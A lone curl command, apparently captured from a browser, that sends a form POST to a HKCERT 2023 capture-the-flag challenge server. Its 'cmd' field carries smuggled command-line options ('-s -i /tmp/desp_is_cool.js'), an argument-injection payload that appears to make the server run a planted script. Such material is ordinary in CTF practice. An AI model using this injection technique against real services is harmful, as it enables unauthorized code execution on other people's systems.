curl 'http://chal-a.hkcert23.pwnable.hk:28320/' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H 'Accept-Language: en-US,en;q=0.9,fr;q=0.8' \
  -H 'Cache-Control: max-age=0' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://chal-a.hkcert23.pwnable.hk:28320' \
  -H 'Referer: http://chal-a.hkcert23.pwnable.hk:28320/' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0' \
  --data-raw 'json=&cmd=-s+-i+%2Ftmp%2Fdesp_is_cool.js' \
  --compressed \
  --insecure
